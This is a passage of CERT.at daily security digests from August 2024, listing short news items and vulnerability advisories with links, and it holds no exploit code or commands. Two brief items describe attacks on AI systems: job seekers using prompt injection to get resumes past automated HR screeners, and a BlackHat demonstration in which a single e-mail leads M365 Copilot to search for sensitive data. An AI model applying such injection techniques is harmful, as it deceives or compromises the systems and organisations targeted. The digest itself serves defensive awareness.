---------------------------------------------
My story started a few months ago, when I performed a red team assessment for a major retail company. During the Open Source Reconnaissance (OSINT) phase, I reviewed the SSL certificates that included the client name. In these certificates I identified that the client owned its own top-level domain (TLD). A TLD is the last part of a domain name, the letters that come after ..
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/enumerating-privat…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Fedora (389-ds-base, dotnet8.0, python3.13, roundcubemail, thunderbird, and tor), Mageia (roundcubemail), Oracle (.NET 8.0, bind and bind-dyndb-ldap, bind9.16, container-tools:ol8, edk2, firefox, gnome-shell, grafana, httpd:2.4, jose, kernel, krb5, mod_auth_openidc:2.3, orc, poppler, python-urllib3, ..
---------------------------------------------
https://lwn.net/Articles/985980/
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 13-08-2024 18:00 − Wednesday 14-08-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ New scam on WhatsApp: beware of fake security warnings ∗∗∗
---------------------------------------------
Fake SMS messages, supposedly from the WhatsApp Security Center, are currently circulating. The message claims that your account is at risk and that you must carry out a verification in the official security center.
---------------------------------------------
https://www.watchlist-internet.at/news/neue-betrugsmasche-auf-whatsapp-vors…
∗∗∗ Attempts to obtain security companies' services by fraud ∗∗∗
---------------------------------------------
Several security companies (particularly in the field of threat intelligence) report attempts by threat actors to gain access to the affected companies' products under false pretenses.
---------------------------------------------
https://www.cert.at/de/aktuelles/2024/8/versuchte-leistungserschleichung-be…
∗∗∗ Biden administration pledges $11 million to open source security initiative ∗∗∗
---------------------------------------------
The White House and Department of Homeland Security (DHS) are partnering on an $11 million initiative to gain an understanding of how open source software is used across critical infrastructure and to better secure it.
---------------------------------------------
https://therecord.media/open-source-software-security-white-house-dhs-11mil…
∗∗∗ FIN7: The Truth Doesn't Need to be so STARK ∗∗∗
---------------------------------------------
The purpose of this blog post is not to exhaustively identify FIN7 infrastructure; rather, it represents a snapshot in time of activity hosted on the infrastructure of one hosting provider (Stark).
---------------------------------------------
https://www.team-cymru.com/post/fin7-the-truth-doesn-t-need-to-be-so-stark
∗∗∗ Gafgyt Malware Variant Exploits GPU Power and Cloud Native Environments ∗∗∗
---------------------------------------------
In this blog we explain about the campaign, the techniques used and how to detect and protect your environments.
---------------------------------------------
https://blog.aquasec.com/gafgyt-malware-variant-exploits-gpu-power-and-clou…
∗∗∗ Rivers of Phish: Sophisticated Phishing Targets Russia’s Perceived Enemies Around the Globe ∗∗∗
---------------------------------------------
This campaign, which we have investigated in collaboration with Access Now and with the participation of numerous civil society organizations including First Department, Arjuna Team, and RESIDENT.ngo, engages targets with personalized and highly-plausible social engineering in an attempt to gain access to their online accounts. [..] The Citizen Lab is sharing all indicators with major email providers to assist them in tracking and blocking these campaigns.
---------------------------------------------
https://citizenlab.ca/2024/08/sophisticated-phishing-targets-russias-percei…
∗∗∗ Bundestrojaner: how chat surveillance works ∗∗∗
---------------------------------------------
A Bundestrojaner (federal trojan) is malicious software used by authorities and the police. It also makes encrypted messages readable.
---------------------------------------------
https://futurezone.at/netzpolitik/bundestrojaner-chat-ueberwachung-oesterre…
=====================
= Vulnerabilities =
=====================
∗∗∗ SolarWinds fixes critical RCE bug affecting all Web Help Desk versions ∗∗∗
---------------------------------------------
A critical vulnerability in the SolarWinds Web Help Desk solution for customer support could be exploited to achieve remote code execution, the American business software developer warns in a security advisory today.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/solarwinds-fixes-critical-rc…
∗∗∗ Fortinet, Zoom Patch Multiple Vulnerabilities ∗∗∗
---------------------------------------------
Fortinet and Zoom have released patches for multiple vulnerabilities in their products, including high-severity bugs.
---------------------------------------------
https://www.securityweek.com/fortinet-zoom-patch-multiple-vulnerabilities/
∗∗∗ Microsoft Patch Tuesday: attackers targeting Office and Windows with malicious code ∗∗∗
---------------------------------------------
Important security updates have been released for various Microsoft products. Because of ongoing attacks, admins should act quickly. [..] With a CVSS score of 9.8, a vulnerability in Windows' TCP/IP stack is among the most dangerous bugs in the current Patch Tuesday. Unauthenticated attackers who send crafted IPv6 packets to Windows machines can compromise them remotely and execute their own commands.
---------------------------------------------
https://heise.de/-9834085
∗∗∗ Xen Security Advisory CVE-2024-31146 / XSA-461 ∗∗∗
---------------------------------------------
https://xenbits.xen.org/xsa/advisory-461.html
∗∗∗ Xen Security Advisory CVE-2024-31145 / XSA-460 ∗∗∗
---------------------------------------------
https://xenbits.xen.org/xsa/advisory-460.html
∗∗∗ Adobe Releases Security Updates for Multiple Products ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/08/14/adobe-releases-security-…
=====================
= End-of-Day report =
=====================
Timeframe: Monday 12-08-2024 18:00 − Tuesday 13-08-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ APT trends report Q2 2024 ∗∗∗
---------------------------------------------
The report features the most significant developments relating to APT groups in Q2 2024, including the new backdoor in Linux utility XZ, a new RAT called SalmonQT, and hacktivist activity.
---------------------------------------------
https://securelist.com/apt-trends-report-q2-2024/113275/
∗∗∗ AMD won’t patch Sinkclose security bug on older Zen CPUs ∗∗∗
---------------------------------------------
Some AMD processors dating back to 2006 have a security vulnerability that's a boon for particularly underhand malware and rogue insiders, though the chip designer is only patching models made since 2020.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2024/08/13/amd_sinkclos…
∗∗∗ Who uses LLM prompt injection attacks IRL? Mostly unscrupulous job seekers, jokesters and trolls ∗∗∗
---------------------------------------------
Because apps talking like pirates and creating ASCII art never gets old. Despite worries about criminals using prompt injection to trick large language models (LLMs) into leaking sensitive data or performing other destructive actions, most of these types of AI shenanigans come from job seekers trying to get their resumes past automated HR screeners – and people protesting generative AI for various reasons, according to Russian security biz Kaspersky.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2024/08/13/who_uses_llm…
∗∗∗ CVE-2024-38856: Pre-Auth RCE Vulnerability in Apache OFBiz ∗∗∗
---------------------------------------------
On August 5, 2024, researchers at SonicWall discovered a zero-day security flaw in Apache OFBiz tracked as CVE-2024-38856. The vulnerability, which has been assigned a CVSS score of 9.8, allows threat actors to perform pre-authentication remote code execution (RCE). While testing a patch for CVE-2024-36104, SonicWall researchers discovered that unauthenticated access was permitted to the ProgramExport endpoint, potentially enabling the execution of arbitrary code.
---------------------------------------------
https://www.zscaler.com/blogs/security-research/cve-2024-38856-pre-auth-rce…
∗∗∗ Post-Quantum Cryptography Standards Officially Announced by NIST – a History and Explanation ∗∗∗
---------------------------------------------
NIST has formally published three post-quantum cryptography standards from the competition it held to develop cryptography able to withstand the anticipated quantum computing decryption of current asymmetric encryption.
---------------------------------------------
https://www.securityweek.com/post-quantum-cryptography-standards-officially…
∗∗∗ Fake notification in the name of the Federal Chancellery about compensation payments ∗∗∗
---------------------------------------------
Criminals are sending fake e-mails in the name of the Federal Chancellery about a compensation payment for water and energy bills. The e-mail states that you will receive € 102,49. To receive the sum, however, you must click on a link.
---------------------------------------------
https://www.watchlist-internet.at/news/falsche-mitteilung-im-namen-des-bund…
∗∗∗ Harnessing LLMs for Automating BOLA Detection ∗∗∗
---------------------------------------------
Learn about BOLABuster, an LLM-driven tool automating BOLA vulnerability detection in web applications. Issues have already been identified in multiple projects.
---------------------------------------------
https://unit42.paloaltonetworks.com/automated-bola-detection-and-ai/
∗∗∗ Law enforcement strikes a blow against the Radar/Dispossessor ransomware group ∗∗∗
---------------------------------------------
It is the next blow against cybercriminals. Law enforcement agencies from the USA (FBI), the United Kingdom and Germany have succeeded in dismantling the infrastructure of the Radar/Dispossessor ransomware group.
---------------------------------------------
https://www.borncity.com/blog/2024/08/13/strafverfolgern-gelingt-schlag-geg…
∗∗∗ Hackers Leak 1.4 Billion Tencent User Accounts Online ∗∗∗
---------------------------------------------
Massive data leak exposes 1.4 billion Tencent user accounts. Leaked data includes emails, phone numbers, and QQ IDs potentially linked to the “Mother of All Breaches” (MOAB).
---------------------------------------------
https://hackread.com/hackers-leak-1-4-billion-tencent-user-accounts-online/
∗∗∗ CryptoCore: Unmasking the Sophisticated Cryptocurrency Scam Operations ∗∗∗
---------------------------------------------
This report delves into the intricacies of the CryptoCore group’s scam and analyses their modus operandi. We will describe key exploited events, including hijacked YouTube accounts and deepfake videos, alongside a technical analysis of the fraudulent sites. One purpose of this study is to present a fundamental analysis – and key statistics – of fraudulent wallets that have received profits in the millions of dollars, as well as provide statistical data on detections, showing how victims are lured into suspicious websites and ultimately end up crypto scam victims.
---------------------------------------------
https://decoded.avast.io/martinchlumecky1/cryptocore-unmasking-the-sophisti…
∗∗∗ Ivanti warns of critical vTM auth bypass with public exploit ∗∗∗
---------------------------------------------
Tracked as CVE-2024-7593, this auth bypass vulnerability is due to an incorrect implementation of an authentication algorithm that allows remote unauthenticated attackers to bypass authentication on Internet-exposed vTM admin panels.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/ivanti-warns-of-critical-vtm…
=====================
= Vulnerabilities =
=====================
∗∗∗ Ivanti: August Security Update ∗∗∗
---------------------------------------------
Today, fixes have been released for the following solutions: Ivanti Neurons for ITSM, Ivanti Avalanche and Ivanti Virtual Traffic Manager (vTM).
---------------------------------------------
https://www.ivanti.com/blog/august-security-update
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (kernel and roundcube), Fedora (microcode_ctl, pypy, python2.7, and python3.6), Oracle (389-ds-base, httpd, kernel, kernel-container, and linux-firmware), Red Hat (kernel-rt), SUSE (firefox, kubernetes1.23, libqt5-qtbase, openssl-1_1, python-gunicorn, python-Twisted, python-urllib3, and qt6-base), and Ubuntu (linux-aws-5.15, linux-gkeop-5.15, linux-ibm, linux-ibm-5.15, linux-raspi, linux-azure, linux-azure-5.15, linux-azure-fde, linux-azure-fde-5.15, linux-oem-6.8, linux-oracle-5.15, and qemu).
---------------------------------------------
https://lwn.net/Articles/985481/
∗∗∗ SAP Patches Critical Vulnerabilities in BusinessObjects, Build Apps ∗∗∗
---------------------------------------------
SAP has released 25 security notes on August 2024 Security Patch Day, including for critical vulnerabilities in BusinessObjects and Build Apps.
---------------------------------------------
https://www.securityweek.com/sap-patches-critical-vulnerabilities-in-busine…
∗∗∗ CISA Releases Ten Industrial Control Systems Advisories ∗∗∗
---------------------------------------------
AVEVA SuiteLink Server, Rockwell Automation, Ocean Data Systems
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/08/13/cisa-releases-ten-indust…
∗∗∗ Splunk: SVD-2024-0801: Third-Party Package Updates in Python for Scientific Computing - August 2024 ∗∗∗
---------------------------------------------
https://advisory.splunk.com//advisories/SVD-2024-0801
∗∗∗ Lenovo: NVIDIA GPU Display Driver - July 2024 ∗∗∗
---------------------------------------------
http://support.lenovo.com/product_security/PS500637-NVIDIA-GPU-DISPLAY-DRIV…
∗∗∗ Lenovo: LDCC and LADM Privilege Escalation Vulnerabilities ∗∗∗
---------------------------------------------
http://support.lenovo.com/product_security/PS500636-LDCC-AND-LADM-PRIVILEGE…
∗∗∗ 0patch: The "EventLogCrasher" 0day For Remotely Disabling Windows Event Log, And a Free Micropatch For It ∗∗∗
---------------------------------------------
https://blog.0patch.com/2024/01/the-eventlogcrasher-0day-for-remotely.html
∗∗∗ tenable: [R1] Stand-alone Security Patch Available for Tenable Security Center versions 6.2.1, 6.3.0 and 6.4.0: SC-202408.1 ∗∗∗
---------------------------------------------
https://www.tenable.com/security/tns-2024-13
=====================
= End-of-Day report =
=====================
Timeframe: Friday 09-08-2024 18:00 − Monday 12-08-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Password managers and VPN apps: plaintext passwords read from process memory ∗∗∗
---------------------------------------------
Passwords inevitably end up in memory during processing. In some applications, however, they remain there for too long, which enlarges the attack surface.
---------------------------------------------
https://www.golem.de/news/passwortmanager-und-vpn-apps-klartextpasswoerter-…
∗∗∗ Encryption bypassed: researcher takes control of ATMs ∗∗∗
---------------------------------------------
Many a hacker dreams of cracking ATM software in order to have unlimited cash dispensed. A researcher has apparently achieved exactly that. [..] According to the security researcher, however, a successful attack requires physical access to the respective ATM, "in which you open the upper part of the ATM, remove the hard drive and then manipulate the contents of the hard drive".
---------------------------------------------
https://www.golem.de/news/verschluesselung-ausgehebelt-forscher-uebernimmt-…
∗∗∗ Experts Uncover Severe AWS Flaws Leading to RCE, Data Theft, and Full-Service Takeovers ∗∗∗
---------------------------------------------
Cybersecurity researchers have discovered multiple critical flaws in Amazon Web Services (AWS) offerings that, if successfully exploited, could result in serious consequences. [..] Following responsible disclosure in February 2024, Amazon addressed the shortcomings over several months from March to June. The findings were presented at Black Hat USA 2024.
---------------------------------------------
https://thehackernews.com/2024/08/experts-uncover-severe-aws-flaws.html
∗∗∗ Living off the land with Bluetooth PAN ∗∗∗
---------------------------------------------
Just like in the living off the land native SSH blog post, this is not a new and clever method of attack, rather it is using tools that are built-in to Windows to present an unexpected vector for access to networks that could mask many of the common tools used to assess a network. [..] Look at disabling these using Intune / Group Policy configuration policies. If there is a justification for their use, consider monitoring the usage of these tools in your environment.
---------------------------------------------
https://www.pentestpartners.com/security-blog/living-off-the-land-with-blue…
∗∗∗ BlackHat 2024: Remote code execution attack on M365 Copilot via e-mail ∗∗∗
---------------------------------------------
At BlackHat 2024, Michael Bargury demonstrated RCE attacks on M365 Copilot: a single e-mail is enough to search for sensitive data. In total, Bargury presents five different attack methods against Microsoft's AI solutions. Here is a brief overview of the topic.
---------------------------------------------
https://www.borncity.com/blog/2024/08/11/blackhat-2024-remote-code-executio…
∗∗∗ Ongoing Social Engineering Campaign Refreshes Payloads ∗∗∗
---------------------------------------------
On June 20, 2024, Rapid7 identified multiple intrusion attempts by threat actors utilizing Techniques, Tactics, and Procedures (TTPs) that are consistent with an ongoing social engineering campaign being tracked by Rapid7. [..] The initial lure being utilized by the threat actors remains the same: an email bomb followed by an attempt to call impacted users and offer a fake solution.
---------------------------------------------
https://www.rapid7.com/blog/post/2024/08/12/ongoing-social-engineering-camp…
∗∗∗ Google Patches Critical Vulnerabilities in Quick Share After Researchers’ Warning ∗∗∗
---------------------------------------------
A groundbreaking presentation at Defcon 32 has revealed critical flaws in Google’s Quick Share, a peer-to-peer data-transfer utility for Android, Windows, and Chrome operating systems. Quick Share boasts impressive versatility, utilizing Bluetooth, Wi-Fi, Wi-Fi Direct, WebRTC, and NFC to facilitate peer-to-peer file transfers; however, these protocols are not designed for file transfers but rather to establish stable device connections for communication purposes.
---------------------------------------------
https://hackread.com/google-patches-quick-share-vulnerabilities-warning/
∗∗∗ Breaking into company-internal groups with domain-based authentication ∗∗∗
---------------------------------------------
What do you get from an ancient protocol, a library used millions of times over and authentication by mail domain? Access to the internal GitHub network.
---------------------------------------------
https://heise.de/-9830944
=====================
= Vulnerabilities =
=====================
∗∗∗ New vulnerabilities in OpenVPN ∗∗∗
---------------------------------------------
Microsoft has found a series of vulnerabilities in the OpenVPN clients for Android, iOS, macOS, BSD and Windows. Attackers could combine some of the discovered vulnerabilities to obtain a remotely exploitable attack chain comprising remote code execution (RCE) and local privilege escalation (LPE). The vulnerabilities should be eliminated through updates, although in some cases this depends on firmware from the various device manufacturers.
---------------------------------------------
https://www.borncity.com/blog/2024/08/10/neue-schwachstellen-in-openvpn/
∗∗∗ Security vulnerabilities: network monitoring tool Zabbix can leak passwords ∗∗∗
---------------------------------------------
In current releases of the network monitoring tool Zabbix, the developers have closed a total of eight security vulnerabilities. After successful attacks, attackers can, for example, view passwords in plaintext or even execute malicious code.
---------------------------------------------
https://heise.de/-9832311
∗∗∗ Industrial Remote Access Tool Ewon Cosy+ Vulnerable to Root Access Attacks ∗∗∗
---------------------------------------------
Security vulnerabilities have been disclosed in the industrial remote access solution Ewon Cosy+ that could be abused to gain root privileges to the devices and stage follow-on attacks.
---------------------------------------------
https://thehackernews.com/2024/08/industrial-remote-access-tool-ewon-cosy.h…
∗∗∗ FreeBSD Releases Urgent Patch for High-Severity OpenSSH Vulnerability ∗∗∗
---------------------------------------------
The maintainers of the FreeBSD Project have released security updates to address a high-severity flaw in OpenSSH that attackers could potentially exploit to execute arbitrary code remotely with elevated privileges. The vulnerability, tracked as CVE-2024-7589, carries a CVSS score of 7.4 out of a maximum of 10.0, indicating high severity.
---------------------------------------------
https://thehackernews.com/2024/08/freebsd-releases-urgent-patch-for-high.ht…
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (httpd:2.4), Fedora (chromium, firefox, frr, neatvnc, nss, python-setuptools, and python3.13), Gentoo (AFLplusplus, Bundler, dpkg, GnuPG, GPAC, libde265, matio, MuPDF, PHP, protobuf, protobuf-python, protobuf-c, rsyslog, Ruby on Rails, and runc), Red Hat (389-ds-base, container-tools:rhel8, and httpd:2.4), SUSE (bind and ca-certificates-mozilla), and Ubuntu (linux-azure).
---------------------------------------------
https://lwn.net/Articles/985336/
∗∗∗ Warning about Microsoft Office spoofing vulnerability CVE-2024-38200 ∗∗∗
---------------------------------------------
On 8 August 2024 (with an update on 10 August 2024), Microsoft published a warning about an unpatched spoofing vulnerability, CVE-2024-38200. The vulnerability is present in all Office versions (Office 2016 to 2021, Office 365). [..] Attackers are able to provide a file via a specially crafted or compromised website in order to exploit the vulnerability. Through the vulnerability, NTLM hashes could be disclosed to remote attackers.
---------------------------------------------
https://www.borncity.com/blog/2024/08/12/warnung-vor-microsoft-office-spoof…
∗∗∗ "Ghostwrite" vulnerability allows DRAM access in RISC-V CPUs ∗∗∗
---------------------------------------------
German researchers found vulnerabilities in individual RISC-V CPUs from T-Head Semiconductors. The flexible, young architecture turns out to be a risk. [..] However, the discovered vulnerabilities cannot be fixed with microcode or a software update even after their disclosure, because they lie in the hardware circuitry.
---------------------------------------------
https://heise.de/-9830926
∗∗∗ B&R: 2024-08-09: Cyber Security Advisory - B&R Automation Runtime Several vulnerabilities in B&R Automation Runtime ∗∗∗
---------------------------------------------
https://www.br-automation.com/fileadmin/SA24P011-d8aaf02f.pdf
∗∗∗ Asterisk Security Advisories ∗∗∗
---------------------------------------------
https://www.asterisk.org/downloads/security-advisories/
∗∗∗ GitLab Patch Release: 17.2.2, 17.1.4, 17.0.6 ∗∗∗
---------------------------------------------
https://about.gitlab.com/releases/2024/08/07/patch-release-gitlab-17-2-2-re…
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 08-08-2024 18:00 − Friday 09-08-2024 18:00
Handler: Robert Waldner
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Malware force-installs Chrome extensions on 300,000 browsers, patches DLLs ∗∗∗
---------------------------------------------
An ongoing and widespread malware campaign force-installed malicious Google Chrome and Microsoft Edge browser extensions in over 300,000 browsers, modifying the browsers' executables to hijack homepages and steal browsing history.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/malware-force-installs-chrom…
∗∗∗ ‘Sinkclose’ Flaw in Hundreds of Millions of AMD Chips Allows Deep, Virtually Unfixable Infections ∗∗∗
---------------------------------------------
Researchers warn that a bug in AMD’s chips would allow attackers to root into some of the most privileged portions of a computer—and that it has persisted in the company’s processors for decades.
---------------------------------------------
https://www.wired.com/story/amd-chip-sinkclose-flaw/
∗∗∗ Windows Server at risk from PoC exploit for CVE-2024-38077 ∗∗∗
---------------------------------------------
Another follow-up to the July 2024 Patch Tuesday, on which Microsoft closed vulnerability CVE-2024-38077 in the Windows Remote Desktop Licensing service (RDL) of Windows Server. [..] a proof of concept (PoC) for this vulnerability has been published.
---------------------------------------------
https://www.borncity.com/blog/2024/08/09/windows-server-durch-poc-exploit-f…
∗∗∗ How Hackers Extracted the ‘Keys to the Kingdom’ to Clone HID Keycards ∗∗∗
---------------------------------------------
[HID] has actually known about the vulnerabilities [..] since sometime in 2023, when it was first informed about the technique by another security researcher [..] HID warned customers about the existence of a vulnerability that would allow hackers to clone keycards in an advisory in January, which includes recommendations about how customers can protect themselves, but it offered no software update at that time.
---------------------------------------------
https://www.wired.com/story/hid-keycard-authentication-key-vulnerability/
∗∗∗ ICANN reserves .internal for private use at the DNS level ∗∗∗
---------------------------------------------
The Internet Corporation for Assigned Names and Numbers (ICANN) has agreed to reserve the .internal top-level domain so it can become the equivalent to using the 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 IPv4 address blocks for internal networks. Those blocks are reserved for private use by the Internet Assigned Numbers Authority, which requires they never appear on the public internet.
---------------------------------------------
https://www.theregister.com/2024/08/08/dot_internal_ratified/
∗∗∗ New attack against the [Linux kernel] SLUB allocator ∗∗∗
---------------------------------------------
Researchers from Graz University of Technology have published details of a new attack on the Linux kernel called SLUBstack. The attack uses timing information to turn an ability to trigger use-after-free or double-free bugs into the ability to overwrite page tables, and thence into the ability to read and write arbitrary areas of memory. The good news is that this attack does require an existing bug to be usable; the bad news is that the kernel regularly sees bugs of this kind.
---------------------------------------------
https://lwn.net/Articles/984984/
∗∗∗ Fake videos: Van der Bellen & Assinger are not advertising investment platforms ∗∗∗
---------------------------------------------
We are currently once again seeing a wave of deepfake videos in which Austrian celebrities advertise investment platforms on Facebook and Instagram. Do not be fooled: neither Federal President Alexander van der Bellen nor TV presenter Armin Assinger have suddenly become financial experts who developed an investment platform. The platforms are fraudulent and the videos were created by criminals.
---------------------------------------------
https://www.watchlist-internet.at/news/fake-videos-van-der-bellen-assinger-…
∗∗∗ Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server! ∗∗∗
---------------------------------------------
This article explores architectural issues within the Apache HTTP Server, highlighting several technical debts within Httpd, including 3 types of Confusion Attacks, 9 new vulnerabilities, 20 exploitation techniques, and over 30 case studies. [..] These vulnerabilities were reported through the official security mailing list and were addressed by the Apache HTTP Server in the 2.4.60 update published on 2024-07-01.
---------------------------------------------
https://devco.re/blog/2024/08/09/confusion-attacks-exploiting-hidden-semant…
∗∗∗ Best Practices for Cisco Device Configuration ∗∗∗
---------------------------------------------
In recent incidents, CISA has seen malicious cyber actors acquire system configuration files by leveraging available protocols or software on devices, such as abusing the legacy Cisco Smart Install feature. CISA recommends organizations disable Smart Install and review NSA’s Smart Install Protocol Misuse advisory and Network Infrastructure Security Guide for configuration guidance.
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/08/08/best-practices-cisco-dev…
∗∗∗ Security researchers turn Sonos One speakers into a bugging device ∗∗∗
---------------------------------------------
Attackers can record conversations via the built-in microphone of Sonos One speakers. The security problem has since been resolved.
---------------------------------------------
https://heise.de/-9830061
=====================
= Vulnerabilities =
=====================
∗∗∗ Vulnerabilities in 1Password endanger macOS users [CVE-2024-42218, CVE-2024-42219] ∗∗∗
---------------------------------------------
1Password 8 for Mac contains two security holes that allow attackers to grab vault items from macOS users. [..] For an attack to succeed, however, with both holes an attacker must already be able to run their own software on the target system.
---------------------------------------------
https://www.golem.de/news/datenabfluss-moeglich-schwachstellen-in-1password…
∗∗∗ Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability [CVE-2024-38219] ∗∗∗
---------------------------------------------
Successful exploitation of this vulnerability requires an attacker to gather information specific to the environment and take additional actions prior to exploitation to prepare the target environment. Fixed in Microsoft Edge Version 127.0.2651.98 released 8/8/2024.
---------------------------------------------
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38219
∗∗∗ Microsoft Edge (HTML-based) Memory Corruption Vulnerability [CVE-2024-38218] ∗∗∗
---------------------------------------------
The word Remote in the title refers to the location of the attacker. This type of exploit is sometimes referred to as Arbitrary Code Execution (ACE). The attack itself is carried out locally. This means an attacker or victim needs to execute code from the local machine to exploit the vulnerability. Fixed in Microsoft Edge Version 127.0.2651.98 released 8/8/2024.
---------------------------------------------
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38218
∗∗∗ Multiple vulnerabilities in LogSign ∗∗∗
---------------------------------------------
https://www.zerodayinitiative.com/advisories/ZDI-24-1102/
http://www.zerodayinitiative.com/advisories/ZDI-24-1103/
http://www.zerodayinitiative.com/advisories/ZDI-24-1104/
https://www.zerodayinitiative.com/advisories/ZDI-24-1105/
https://www.zerodayinitiative.com/advisories/ZDI-24-1106/
---------------------------------------------
https://support.logsign.net/hc/en-us/articles/20617133769362-07-08-2024-Ver…
∗∗∗ PostgreSQL relation replacement during pg_dump executes arbitrary SQL [CVE-2024-7348] ∗∗∗
---------------------------------------------
Time-of-check Time-of-use (TOCTOU) race condition in pg_dump in PostgreSQL allows an object creator to execute arbitrary SQL functions as the user running pg_dump, which is often a superuser. The attack involves replacing another relation type with a view or foreign table. The attack requires waiting for pg_dump to start, but winning the race condition is trivial if the attacker retains an open transaction. Versions before PostgreSQL 16.4, 15.8, 14.13, 13.16, and 12.20 are affected.
---------------------------------------------
https://www.postgresql.org/support/security/CVE-2024-7348/
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (httpd, kernel, kernel-rt, and libtiff), Debian (postgresql-13, postgresql-15, and thunderbird), Fedora (frr, thunderbird, vim, and xrdp), Gentoo (Librsvg, Nautilus, ncurses, Percona XtraBackup, QEMU, and re2c), Red Hat (httpd, kernel, kernel-rt, openssl, and python-setuptools), SUSE (bind, ffmpeg-4, kubernetes1.23, kubernetes1.24, python-Django, and python3-Twisted), and Ubuntu (linux, linux-aws, linux-aws-5.4, linux-gcp, linux-gcp-5.4, linux-gkeop, linux-hwe-5.4, linux-ibm, linux-ibm-5.4, linux-iot, linux-kvm, linux-raspi, linux-xilinx-zynqmp, linux, linux-aws, linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop, linux-intel-iotg, linux-intel-iotg-5.15, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux, linux-aws, linux-gcp, linux-gke, linux-ibm, linux-nvidia, linux-nvidia-6.8, linux-oem-6.8, linux-nvidia-lowlatency, linux-oracle, linux-oracle, linux-oracle-5.4, salt.
---------------------------------------------
https://lwn.net/Articles/984966/
∗∗∗ New FileSender 2.49 release with major changes ∗∗∗
---------------------------------------------
We are happy to announce the release of FileSender 2.49. This new release includes security updates that you should install. Also, it offers a few features and improvements, as well as many bug fixes.
---------------------------------------------
https://connect.geant.org/2024/08/08/new-filesender-2-49-release-with-major…
∗∗∗ 0.0.0.0 Day vulnerability has enabled attacks on browsers for 18 years ∗∗∗
---------------------------------------------
Security researchers have disclosed that hackers have exploited an 18-year-old, long-known bug in Safari, Chrome and Firefox to break into private networks. The vulnerability, dubbed "0.0.0.0 Day", allows malicious websites to bypass browser security and interact with services running on an organization's local network. This can lead to unauthorized access and remote code execution on local services by attackers outside the network. Browser vendors are now beginning to block this address.
---------------------------------------------
https://www.borncity.com/blog/2024/08/09/0-0-0-0-day-schwachstelle-ermglich…
∗∗∗ RaonSecure Product Security Advisory ∗∗∗
---------------------------------------------
Overview: RaonSecure has released an update to address a vulnerability in their products. Users of affected versions are advised to update to the latest version. Affected Products: TouchEn nxKey version ~ 1.0.0.87 (included)
---------------------------------------------
https://asec.ahnlab.com/en/82372/
∗∗∗ LibreOffice: Ability to trust not validated macro signatures removed in high security mode [CVE-2024-6472] ∗∗∗
---------------------------------------------
https://www.libreoffice.org/about-us/security/advisories/CVE-2024-6472
∗∗∗ IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data is vulnerable to multiple Vim-minimal Package Issues ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164174
∗∗∗ Multiple security vulnerabilities are addressed with IBM Cloud Pak for Business Automation iFixes for July 2024. ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7161907
∗∗∗ Multiple vulnerabilities in IBM Business Automation Workflow Machine Learning Server are addressed with 24.0.0-IF001 ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164164
∗∗∗ IBM Cloud Pak for Data is vulnerable to unknown impact and attack vector due to Python certifi ( CVE-2022-23491 ) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164180
∗∗∗ IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data is vulnerable to multiple Base OS issues ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164175
∗∗∗ IBM Cloud Pak for Data is vulnerable to session hijacking due to Node.js passport module ( CVE-2022-25896 ) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164201
∗∗∗ IBM Cloud Pak for Data is vulnerable to denial of service due to Node.js http-cache-semantics module ( CVE-2022-25881 ) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164225
∗∗∗ IBM Cloud Pak for Data is vulnerable to denial of service due to Node.js cookiejar module ( CVE-2022-25901 ) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164200
∗∗∗ IBM Cloud Pak for Data is vulnerable to cross-site scripting due to Jinja2 ( CVE-2024-34064 ) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164204
∗∗∗ IBM Cloud Pak for Data is vulnerable to denial of service due to Pallets Werkzeug ( CVE-2023-46136 ) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164208
∗∗∗ IBM Cloud Pak for Data is vulnerable to denial of service due to Express.js ( CVE-2022-24999 ) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164217
∗∗∗ IBM Cloud Pak for Data is vulnerable to several issues due to the go compiler ( CVE-2022-41724 CVE-2021-34558 ) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164255
